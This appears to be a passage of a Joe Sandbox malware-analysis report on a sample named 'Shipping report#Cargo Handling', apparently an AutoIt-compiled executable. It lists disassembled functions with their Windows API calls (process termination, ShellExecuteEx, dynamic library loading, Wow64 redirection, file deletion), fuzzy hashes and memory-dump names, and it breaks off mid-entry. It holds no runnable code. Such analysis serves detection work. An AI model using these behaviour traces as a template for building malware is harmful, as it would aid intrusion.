MapVirtualKeyW.USER32(000000A1,00000000), ref: 00091C12
MapVirtualKeyW.USER32(00000011,00000000), ref: 00091C1A
MapVirtualKeyW.USER32(00000012,00000000), ref: 00091C22

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 9d820f72c2547e1e75c3b1a750db94e5b6205a176f245c1c4082fae783148a31
Instruction ID: 47e8be1f42e5db17e9ecf9a95dc881bb62a2246d74a6aea90c76132aaa9e0ca2
Opcode Fuzzy Hash: 9d820f72c2547e1e75c3b1a750db94e5b6205a176f245c1c4082fae783148a31
Instruction Fuzzy Hash: 0D016CB09027597DE3008F5A8C85B56FFA8FF19354F00411B915C47A41C7F5A864CBE5

Function 000FEB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 000FEB30
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 000FEB46
GetWindowThreadProcessId.USER32(?,?), ref: 000FEB55
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000FEB64
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000FEB6E
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 000FEB75

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 521e5b1733e42717eae6709eed2abbca23d34353ebeaf9892104b3d372248c50
Instruction ID: ac7c3b4c6e9ad62bf2131b954f93c03af4d7c1560520cbb79d099c9822d6ba34
Opcode Fuzzy Hash: 521e5b1733e42717eae6709eed2abbca23d34353ebeaf9892104b3d372248c50
Instruction Fuzzy Hash: 2BF01772240558BBE6315B629C0EEEF3A7CEBCAB11F000158F701D1591A7A05A628AF5

Function 000E7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?), ref: 000E7452
SendMessageW.USER32(?,00001328,00000000,?), ref: 000E7469
GetWindowDC.USER32(?), ref: 000E7475
GetPixel.GDI32(00000000,?,?), ref: 000E7484
ReleaseDC.USER32(?,00000000), ref: 000E7496
GetSysColor.USER32(00000005), ref: 000E74B0

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ClientColorMessagePixelRectReleaseSendWindow
String ID:
API String ID: 272304278-0
Opcode ID: 24e0f8637e3a553ebc276eb11a2f475be340bafbbaec0801bb1851b2cd6f3338
Instruction ID: 6472dc7189c83c374d86ee5310d0b2a68b7a6d36a46a2f383c1144858898a1c8
Opcode Fuzzy Hash: 24e0f8637e3a553ebc276eb11a2f475be340bafbbaec0801bb1851b2cd6f3338
Instruction Fuzzy Hash: 75014B31500215FFDB715FA4DC09BEEBBB6FF04321F550164FA1AA25A1CB315EA2AB90

Function 000F1874 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 000F187F
UnloadUserProfile.USERENV(?,?), ref: 000F188B
CloseHandle.KERNEL32(?), ref: 000F1894
CloseHandle.KERNEL32(?), ref: 000F189C
GetProcessHeap.KERNEL32(00000000,?), ref: 000F18A5
HeapFree.KERNEL32(00000000), ref: 000F18AC

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: bbc0820bf4cce6b4916601d458fa63c6231b2b6fe455fbc943c766bf3aad5a5e
Instruction ID: 82ce7966512578e7306218fcbef81ea9883028190c2cf8d8620e10d5f77dcd93
Opcode Fuzzy Hash: bbc0820bf4cce6b4916601d458fa63c6231b2b6fe455fbc943c766bf3aad5a5e
Instruction Fuzzy Hash: 8EE0C236004501FFDA115BA1ED0D90ABB29FF49B22B208620F32581874CB3294B2DB90

Function 000FC5D0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00097620: _wcslen.LIBCMT ref: 00097625

GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000FC6EE
_wcslen.LIBCMT ref: 000FC735
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 000FC79C
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 000FC7CA

Strings

0, xrefs: 000FC6AF

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ItemMenu$Info_wcslen$Default
String ID: 0
API String ID: 1227352736-4108050209
Opcode ID: 96c7f298073ca1e6dd9b70be7a779075d256087b5498fabd88d686f2633ca2ae
Instruction ID: f37dcd0b6be2c00803f8fd3360f621a07834b650c1b5995be6575372a852a7bd
Opcode Fuzzy Hash: 96c7f298073ca1e6dd9b70be7a779075d256087b5498fabd88d686f2633ca2ae
Instruction Fuzzy Hash: BE51F37160830D9BE754AF28CA46EBF77E4AF45314F04092DFA91D3991DB70D904EB52

Function 0011AD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON

Download Yara Rule

APIs

ShellExecuteExW.SHELL32(0000003C), ref: 0011AEA3

Part of subcall function 00097620: _wcslen.LIBCMT ref: 00097625

GetProcessId.KERNEL32(00000000), ref: 0011AF38
CloseHandle.KERNEL32(00000000), ref: 0011AF67

Strings

<, xrefs: 0011AE6B
@, xrefs: 0011AE72

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CloseExecuteHandleProcessShell_wcslen
String ID: <$@
API String ID: 146682121-1426351568
Opcode ID: 5fe4cc343cd3d0e3e897f50ad82f9703d690ec234038cfc10953dc10929afe9f
Instruction ID: d4c3140bdaf7cde5f1b9cd0b4f68bef3ad0cc8f7893f9893e8805836b9e78420
Opcode Fuzzy Hash: 5fe4cc343cd3d0e3e897f50ad82f9703d690ec234038cfc10953dc10929afe9f
Instruction Fuzzy Hash: 20714771A05615DFCF18DFA4C494A9EBBF0AF08310F4484A9E81AAB392C774ED85CB91

Function 000F719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 000F7206
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 000F723C
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 000F724D
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 000F72CF

Strings

DllGetClassObject, xrefs: 000F7242

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 4905d85e0e7406471b55ab95532a23580a0ac69ad3ceee20118fe19538517fbc
Instruction ID: 8459f02ea3a8f3a56c88289a535b2a5e605672c4ed4e9ae4e641528eea859e93
Opcode Fuzzy Hash: 4905d85e0e7406471b55ab95532a23580a0ac69ad3ceee20118fe19538517fbc
Instruction Fuzzy Hash: EE41C271604208EFDB65CF54C884AAA7BF9EF44310F1080ADBE099F60AD7B1DD45DBA1

Function 00123D7C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00123E35
IsMenu.USER32(?), ref: 00123E4A
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00123E92
DrawMenuBar.USER32 ref: 00123EA5

Strings

0, xrefs: 00123D89

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: 8625b0ce45e4c1c6761ce6a77ad0b694d996462e69ab859d1476f50715eb2fc8
Instruction ID: 29b15e587085456145e086d495148e8a1d23839b8c1bfbb7110c737038669b90
Opcode Fuzzy Hash: 8625b0ce45e4c1c6761ce6a77ad0b694d996462e69ab859d1476f50715eb2fc8
Instruction Fuzzy Hash: AB418A75A00219AFDB10DF50E880AEABBB5FF48354F054029E921A7250D334EE69CF90

Function 000F1DE2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00099CB3: _wcslen.LIBCMT ref: 00099CBD

Part of subcall function 000F3CA7: GetClassNameW.USER32(?,?,000000FF), ref: 000F3CCA

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 000F1E66
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 000F1E79
SendMessageW.USER32(?,00000189,?,00000000), ref: 000F1EA9

Part of subcall function 00096B57: _wcslen.LIBCMT ref: 00096B6A

Strings

ComboBox, xrefs: 000F1DF0
ListBox, xrefs: 000F1E25

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 72530aba6b6fe21552362c957c095f611c2723988b05482335948fe21c928702
Instruction ID: e12ce2df0fbacac9467de0fb10826031f09558226ef7ebdbda4c41b039908b7a
Opcode Fuzzy Hash: 72530aba6b6fe21552362c957c095f611c2723988b05482335948fe21c928702
Instruction Fuzzy Hash: 5E216871A00108FEDF24ABA4DC46CFFB7B9DF42360B10411DFA21A76E2DB34490AE660

Function 0011C9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0011C9F1
_wcslen.LIBCMT ref: 0011CA68
_wcslen.LIBCMT ref: 0011CA9E
_wcslen.LIBCMT ref: 0011CAF9
_wcslen.LIBCMT ref: 0011CB2F
_wcslen.LIBCMT ref: 0011CB7F

Strings

HKLM, xrefs: 0011CA98, 0011CA9D
HKEY_LOCAL_MACHINE, xrefs: 0011CA62, 0011CA67

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _wcslen
String ID: HKEY_LOCAL_MACHINE$HKLM
API String ID: 176396367-4004644295
Opcode ID: 67f180cb5de77cbd94db110a1e82b3402dc122caf66fbb6f7e717abda5d4041d
Instruction ID: 5e89310ccd08f1a024bc79f58ed55a735a431b96af012c8c448adbfc3d9023cc
Opcode Fuzzy Hash: 67f180cb5de77cbd94db110a1e82b3402dc122caf66fbb6f7e717abda5d4041d
Instruction Fuzzy Hash: 9D31F533A8016A8BCB2ADE6CA9411FF33915FA1750B554039EC55AB285FB71CEC4D3E0

Function 00122F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00122F8D
LoadLibraryW.KERNEL32(?), ref: 00122F94
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00122FA9
DestroyWindow.USER32(?), ref: 00122FB1

Strings

SysAnimate32, xrefs: 00122F68

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: e0111936579a6813e3a926c21deaee12512143ab0c502acf0234a07d5bcab6ca
Instruction ID: 1ae0d7b775fcec6ff7bd979be1d92c492114dbfa311dc30a4354f99e94d9ec86
Opcode Fuzzy Hash: e0111936579a6813e3a926c21deaee12512143ab0c502acf0234a07d5bcab6ca
Instruction Fuzzy Hash: 6E219A72200225BBEB208F64ED80EBF77B9EB59364F100618FA50D6190D771DCA197A0

Function 000B4D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,000B4D1E,000C28E9,?,000B4CBE,000C28E9,001588B8,0000000C,000B4E15,000C28E9,00000002), ref: 000B4D8D
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 000B4DA0
FreeLibrary.KERNEL32(00000000,?,?,?,000B4D1E,000C28E9,?,000B4CBE,000C28E9,001588B8,0000000C,000B4E15,000C28E9,00000002,00000000), ref: 000B4DC3

Strings

CorExitProcess, xrefs: 000B4D98
mscoree.dll, xrefs: 000B4D86

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: d6cb95859cf4970abd892618b341012917e12c07686631c74335afeeeadd5434
Instruction ID: 84402c989fc4839b0988781e253f080d039d202860b9995d25bd985e7510ac52
Opcode Fuzzy Hash: d6cb95859cf4970abd892618b341012917e12c07686631c74335afeeeadd5434
Instruction Fuzzy Hash: 1FF04F35A40208FBDB619F94DC49BEEBBF5EF48752F0040A8F905A26A1CB305A91CAD1

Function 000ED3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 000ED3AD
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 000ED3BF
FreeLibrary.KERNEL32(00000000), ref: 000ED3E5

Strings

X64, xrefs: 000ED2A8
GetSystemWow64DirectoryW, xrefs: 000ED3B9

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: c414deea639308044d2ea65f51ee5521b0d0dcca4a41e66304f81acf7338c6df
Instruction ID: 13c06ef67e106f7ce17dd659007e088a10eec4b43a849238e3edf0a4db0025ea
Opcode Fuzzy Hash: c414deea639308044d2ea65f51ee5521b0d0dcca4a41e66304f81acf7338c6df
Instruction Fuzzy Hash: 22F0AB31805AA1EFD3B113228C689AD7760FF22702F58805FFB02F6011DB20CEA0C6D2

Function 00094E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00094EDD,?,00161418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00094E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00094EAE
FreeLibrary.KERNEL32(00000000,?,?,00094EDD,?,00161418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00094EC0

Strings

kernel32.dll, xrefs: 00094E94
Wow64DisableWow64FsRedirection, xrefs: 00094EA8

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 970bba944d40467eca0b217b3be2d1756b94d25a97e9af9769300452c74a2db6
Instruction ID: e618beb22a682a845fea08e8132b8c39f90af3d0fdb0c0782196933da4c7d263
Opcode Fuzzy Hash: 970bba944d40467eca0b217b3be2d1756b94d25a97e9af9769300452c74a2db6
Instruction Fuzzy Hash: 2CE0CD35A01532EBD67117257C19F5F65D4AF81FA37050115FE01D3100DB60CD6394E0

Function 00094E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,000D3CDE,?,00161418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00094E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00094E74
FreeLibrary.KERNEL32(00000000,?,?,000D3CDE,?,00161418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00094E87

Strings

kernel32.dll, xrefs: 00094E5B
Wow64RevertWow64FsRedirection, xrefs: 00094E6E

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 53c6ce8a46e806441d71830703eab359eaee9171e4b2e1f5e2b54b52d26298f9
Instruction ID: a035fac9c50c4858b7f6951973a4f79b8e188a4fc65126326825d9a2304a9003
Opcode Fuzzy Hash: 53c6ce8a46e806441d71830703eab359eaee9171e4b2e1f5e2b54b52d26298f9
Instruction Fuzzy Hash: 3DD0C232912A31E78A321B247C09DCF2A58AF85B513050110BE00A2210CF20CD63D5D0

Function 00102947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00102C05
DeleteFileW.KERNEL32(?), ref: 00102C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00102C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00102CAE
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00102CC0

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: a0c2355db5a83bece5d0507ad78b3f761fdb9841110bf8f966f12e8ce3c49b0f
Instruction ID: 6c38ef77f5648c1fdc9a747e663c71e3a4d771e7e0f060a7440554c9ea7bf60e
Opcode Fuzzy Hash: a0c2355db5a83bece5d0507ad78b3f761fdb9841110bf8f966f12e8ce3c49b0f
Instruction Fuzzy Hash: 62B13071D00119ABDF25DBA4CC89EDEB77DEF49350F1040A6FA09E7192EB709A448F61

Function 0011A387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 0011A427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0011A435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 0011A468
CloseHandle.KERNEL32(?), ref: 0011A63D

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
